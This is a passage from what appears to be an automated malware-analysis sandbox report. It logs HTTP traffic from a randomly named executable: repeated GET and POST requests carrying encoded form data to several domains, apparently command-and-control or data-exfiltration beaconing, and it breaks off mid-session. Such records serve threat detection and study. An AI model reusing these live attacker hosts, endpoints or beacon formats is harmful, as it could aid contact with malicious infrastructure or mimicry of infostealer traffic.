                                                                                                                    Data Ascii: FbuX5DnP=KXXFgx8CNRTJGpJiHQiNkRGN9cU8hxfQPm/NpUZy9Ktt0BMhxGQGskiy2MBwd6BMsgeulAPI5MW4/qKNYXGDVsYRNDoTEjmcuDtntrLJ7ob1YksQhkxnEKyQBUsYUuipmzU1Bmu7vpnQP0ESe9qOg8X69Bewp1UozbhX/BvpM+UTb9z/n3hGt+OGJOLxtkwVhrhizcVr/h78veD3M9b66Neui7GKkcf8yj/roEbV5Uwtf1fOiclWuPptFqsL87O593H5W3TVSf9SrzOD51LsFuLbiwzG+TElim9mIXNyxQQhBsZsoDh0rWz0q0yuFjArZ260OrnDQA1WXK9B2hdxSHa6neo7V5lgof6rQjzxX1RYFutEQs34vD2oMWMQZlJrLaMBufLMF0FuOoYgOC6DQH1h+boOhqu91s+l25xQIypLWmbu0B0nlDhd0eVizvRxJ1Ar1ULFJNFSOBO3pRKxUWRDmZuHgNx/LTV2g2MCjt0jvseN5i2zjRrHBkUSoqPVVqym1KPtrx1xPqH82yFjfATICiDc95t3QBXHuW6mPRnECyMOumHVvjz4VDUQNUEJOt5HgYHfT7oRfHW8JzyEZVzBLPHOzxxSFNNBk5wPYGQ31jLSlnigtl4AOaXhzEh6CwU/9NyzBF9d5r0bCF0KMqUN0Z/HKCwyctrWa/bJnhWZClZzczuviMpRBopOtSSOqBlbMeSm5ISFWYhOlNl+sizycXMEvuPpKvGKTLdfNq4vYh7akrk6evugiJmWIWb7a64LGkudB5FWNbyVFwB0Uz5QbRlbHHUDlmDGiX2lEhyCmSdC6UItBPuStmFQ8y8vs9TDp7F7VCXlPXOw8WWaSBTqQT+yItKStDUQTacoKm6LkIMCbrch53G32584A575bcmdoD/f/yb1/UapC7b26j30Nkvlcn+XvuL0NN6ixRpKyu+ZFIoOaud+5EeshYqd16xF05QP+GFe3/Hz/f/ThbT0TOIdRM6/y7uQddwZTwz [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.54974052.223.13.41804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:48.815566063 CEST481OUTGET /iq05/?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:49.261528015 CEST410INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:49 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 270
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 62 75 58 35 44 6e 50 3d 48 56 2f 6c 6a 48 52 34 43 6b 54 72 58 4d 68 62 49 67 71 63 6b 77 79 42 39 65 77 65 75 54 66 76 4c 33 58 69 34 52 6b 4d 71 70 35 67 75 46 55 73 37 47 46 66 74 41 2b 30 38 62 68 56 58 65 78 36 6b 7a 43 41 71 54 4c 7a 7a 63 75 67 78 4a 4f 46 41 32 2f 6b 63 2f 56 67 64 45 55 42 42 30 47 41 6c 52 42 6a 6e 4c 72 51 75 4d 4c 70 41 42 6f 38 75 32 35 56 48 49 76 4b 45 47 45 4f 53 4f 44 2b 39 41 3d 3d 26 32 5a 76 30 3d 71 74 6d 70 6c 34 77 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4wh"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.549741188.114.96.3804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:54.335006952 CEST749OUTPOST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 49 55 39 56 59 4c 4f 63 45 57 54 67 7a 63 63 63 66 33 4e 4b 59 61 32 59 58 30 39 61 58 71 58 4a 62 5a 31 6e 6b 53 46 50 36 44 4a 4a 54 69 4f 78 32 6e 4c 45 49 48 52 56 36 75 73 58 73 5a 32 6b 31 6f 42 53 74 45 69 43 78 4c 6c 4c 6c 32 2f 4c 4e 74 45 2f 5a 57 54 36 44 34 31 50 57 47 30 43 51 4c 4b 78 50 44 5a 51 7a 68 6e 61 4d 5a 54 66 6c 77 48 70 45 45 6c 4f 73 61 63 77 66 6c 63 50 45 44 4c 77 58 4b 4f 4d 7a 64 68 45 6a 2f 69 71 74 34 54 44 30 52 30 61 45 43 6c 69 41 65 4c 56 6c 6d 56 31 63 56 73 43 36 56 31 71 64 71 4b 46 38 4d 7a 59 41 69 4e 76 33 37 6f 3d
                                                                                                                    Data Ascii: FbuX5DnP=j61RLW+4xQmTIU9VYLOcEWTgzcccf3NKYa2YX09aXqXJbZ1nkSFP6DJJTiOx2nLEIHRV6usXsZ2k1oBStEiCxLlLl2/LNtE/ZWT6D41PWG0CQLKxPDZQzhnaMZTflwHpEElOsacwflcPEDLwXKOMzdhEj/iqt4TD0R0aECliAeLVlmV1cVsC6V1qdqKF8MzYAiNv37o=
                                                                                                                    Sep 30, 2024 19:58:54.788800955 CEST836INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:54 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:54 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afCkjHWCtwPqc0fbD%2Bkg%2B%2B6KCL36NNynOUzNII%2FzIqGeRH8JXp%2ByjohYOpUGlua%2FuL%2Ff90txO5J42abs6NS0BAn%2FIPihknDI3VR7Ttaicg9KXm3Q2kGzT%2FFUYOuAX6bU5miYE3oejqUV"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61a901b7f42b3-EWR
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.549742188.114.96.3804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:56.874047041 CEST769OUTPOST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 4b 31 4e 56 61 6f 57 63 56 32 54 68 74 4d 63 63 49 6e 4e 57 59 61 71 59 58 78 46 4b 58 35 6a 4a 62 34 46 6e 71 77 39 50 33 6a 4a 4a 62 43 4f 30 79 6e 4c 61 49 48 64 72 36 75 41 58 73 5a 79 6b 31 6f 52 53 74 7a 4f 46 79 37 6c 4a 71 57 2f 4a 44 4e 45 2f 5a 57 54 36 44 34 68 32 57 48 51 43 51 37 36 78 4f 69 5a 58 36 42 6e 5a 62 70 54 66 68 77 48 74 45 45 6c 73 73 59 34 57 66 67 59 50 45 43 37 77 58 62 4f 4c 6f 74 68 34 2b 76 6a 44 6c 36 7a 4b 39 58 6c 51 42 6a 6b 43 52 59 43 78 74 77 34 66 47 33 6b 71 70 31 5a 53 4e 35 43 79 74 38 53 78 61 42 64 66 70 73 2f 34 77 66 70 59 6d 7a 4c 54 47 4b 44 77 6b 69 53 64 70 33 78 55
                                                                                                                    Data Ascii: FbuX5DnP=j61RLW+4xQmTK1NVaoWcV2ThtMccInNWYaqYXxFKX5jJb4Fnqw9P3jJJbCO0ynLaIHdr6uAXsZyk1oRStzOFy7lJqW/JDNE/ZWT6D4h2WHQCQ76xOiZX6BnZbpTfhwHtEElssY4WfgYPEC7wXbOLoth4+vjDl6zK9XlQBjkCRYCxtw4fG3kqp1ZSN5Cyt8SxaBdfps/4wfpYmzLTGKDwkiSdp3xU
                                                                                                                    Sep 30, 2024 19:58:57.348726988 CEST826INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:57 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPym5pxAjbct7v3qol%2Bo3PoYh3fXeCYID8PxGHKhiSS08Z%2BQPSNIsweCfCNfzENhL0XeIfTVOLwHFSdDGaLSS1xMdnpxw5%2F47aPmQCcs1gLdy%2FxqRmEwKLMugpraBebbqId5Me1FhTi3"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61aa009b88cc8-EWR
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.549743188.114.96.3804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:59.425898075 CEST1786OUTPOST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 4b 31 4e 56 61 6f 57 63 56 32 54 68 74 4d 63 63 49 6e 4e 57 59 61 71 59 58 78 46 4b 58 34 62 4a 62 4f 52 6e 71 58 70 50 34 44 4a 4a 56 69 4f 31 79 6e 4b 47 49 48 45 73 36 75 38 70 73 62 61 6b 30 4c 4a 53 72 47 36 46 70 72 6c 4a 6f 57 2f 4d 4e 74 46 2f 5a 57 44 45 44 34 78 32 57 48 51 43 51 35 53 78 61 44 5a 58 32 68 6e 61 4d 5a 54 62 6c 77 48 56 45 46 4d 54 73 59 73 67 65 54 67 50 46 69 72 77 62 4e 53 4c 6b 74 68 41 2f 76 6a 62 6c 36 2b 53 39 54 38 70 42 6a 41 6b 52 66 4f 78 75 46 5a 54 57 30 67 7a 2f 48 6c 78 44 62 2b 6b 36 72 4f 55 63 79 70 73 6f 38 7a 4b 33 39 35 38 77 48 6a 50 55 36 57 7a 6d 58 57 4c 75 32 77 45 50 35 39 49 4a 74 7a 45 78 6e 6b 45 2f 42 51 76 6b 42 32 71 58 4a 77 6a 2b 47 57 35 45 30 74 50 33 48 66 75 73 5a 49 4b 6c 31 49 41 55 42 76 53 50 4e 70 4c 2b 74 73 58 2b 45 33 61 62 37 42 46 7a 4d 4e 46 31 4a 6f 69 75 73 76 54 44 45 54 2f 73 73 68 32 67 5a 65 56 51 2b 31 77 59 67 56 2b 6e 43 34 76 72 79 57 76 6b 38 75 6f 47 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=j61RLW+4xQmTK1NVaoWcV2ThtMccInNWYaqYXxFKX4bJbORnqXpP4DJJViO1ynKGIHEs6u8psbak0LJSrG6FprlJoW/MNtF/ZWDED4x2WHQCQ5SxaDZX2hnaMZTblwHVEFMTsYsgeTgPFirwbNSLkthA/vjbl6+S9T8pBjAkRfOxuFZTW0gz/HlxDb+k6rOUcypso8zK3958wHjPU6WzmXWLu2wEP59IJtzExnkE/BQvkB2qXJwj+GW5E0tP3HfusZIKl1IAUBvSPNpL+tsX+E3ab7BFzMNF1JoiusvTDET/ssh2gZeVQ+1wYgV+nC4vryWvk8uoGvoFGlrOJeNVm2T1n+UhUpHdGWAyEp6r1ba/ZkH28ib1JgPNMDMBiQlrDGZ1AazYO9uEcg9s2xTV3h9zseUzmYcStH7Hms/veQDqLs6G/KcpeaqT+CzA0iXF199srs18HwffVWun7nSdEdf6uPcigmsgJAI5YlWuPI5Ao6hrUx5CzbujtdGgDi9XRfUVvln/wR82LNauxaIbkgcSBQEgGzlyQql5vgtHBvuDeOMVm8j4GHqpoOwhebWgfmXnyWirOuO6UIxAsZDAWbgIoPJzkjhWfxRLlhfvXyN1TAmTXhQyeae9AJXjPOBbWYba2s7ZJ7hen4lb3Dfz4kVdJ6IeOAUPecG8ANFitkoy/3a0bIqymkLwBth9UJJLMU378pMZ7R7+tQzHyDWDW++BbMHRfBaRrRjJszzI9MJnq7ijMvLQ5B3DcHlV7MYPo5YStmn7rD4xiATw3aE9vi+HHzQ3U3+cm6LfDS40BYbKd3iAocY8Vdc9a/Yf4zOfl2h5q2EGKq8bGOuc/0GV15iOR+TbAGAZN990FEeC5w/5sNQvlzDCBQpGCbxCPyyGAfoti+93JtpFVEJKChTSwl6hnaQWnD6DCUTjDX9igbj2/BuX5Z06GohSpNlWFbbHYmb84PoJGBSzovc04e0Wdo3LKajF8PW0uyuhKVVvwdA [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:58:59.901937008 CEST826INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:59 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boLq8b6F%2FEdoPyhmDNxDIvepCZ%2Fx2fdPJlrUZ5TCkcBEXz5xZAib9dZKHsEzqSmYPqMoinITIYYlmFPk%2BNazkiwa70vQodMhxcIhG8NdbyE0Pt9%2BuXtwGvtm0vQfDmt4CWjyrpw2NAXM"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61ab00bc81a24-EWR
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.549744188.114.96.3804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:01.966705084 CEST479OUTGET /g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:02.419495106 CEST998INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:59:02 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFg77M2TAZvyuEEEJMVlZFdnySo%2BNczrv6cvfuzTJzHbDPTzdVXRjUVcvUN8y%2BYDdSQdPQw1pG1AfZiycvghzCCWJRwjeZQh9UTNg9P2dl69V3HC2MBIf0uFS4OLJBkg33lulSwY13TF"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61abfce727d1a-EWR
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.549745206.119.82.147804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:07.475636959 CEST725OUTPOST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 77 67 51 4d 71 6b 6a 2f 63 58 61 6f 4b 6f 33 64 6d 74 6e 72 37 47 52 50 44 69 49 70 43 47 4d 6b 35 31 6f 6f 64 41 4f 7a 42 4f 65 2b 71 39 64 42 6e 44 35 49 38 52 72 63 79 4a 63 6e 43 31 74 4a 55 38 6d 55 56 4b 4c 70 54 70 4e 41 68 6d 50 76 4b 39 77 51 4b 6c 42 36 46 61 55 35 49 77 6f 34 5a 48 4f 4b 36 46 59 35 75 36 56 72 31 2f 6d 2f 42 44 4f 51 76 78 57 77 56 4e 45 49 58 42 48 6e 51 6b 50 37 65 4c 4b 61 38 36 6c 74 71 36 4d 54 4d 6e 55 6c 56 55 39 39 6b 32 67 4e 36 78 2b 4f 4d 55 37 76 70 37 71 31 52 6d 50 33 35 4e 47 33 4e 79 6a 54 53 78 65 55 75 4e 49 3d
                                                                                                                    Data Ascii: FbuX5DnP=7OFv+ElOXEe7wgQMqkj/cXaoKo3dmtnr7GRPDiIpCGMk51oodAOzBOe+q9dBnD5I8RrcyJcnC1tJU8mUVKLpTpNAhmPvK9wQKlB6FaU5Iwo4ZHOK6FY5u6Vr1/m/BDOQvxWwVNEIXBHnQkP7eLKa86ltq6MTMnUlVU99k2gN6x+OMU7vp7q1RmP35NG3NyjTSxeUuNI=
                                                                                                                    Sep 30, 2024 19:59:08.371539116 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.549746206.119.82.147804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:10.021898985 CEST745OUTPOST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
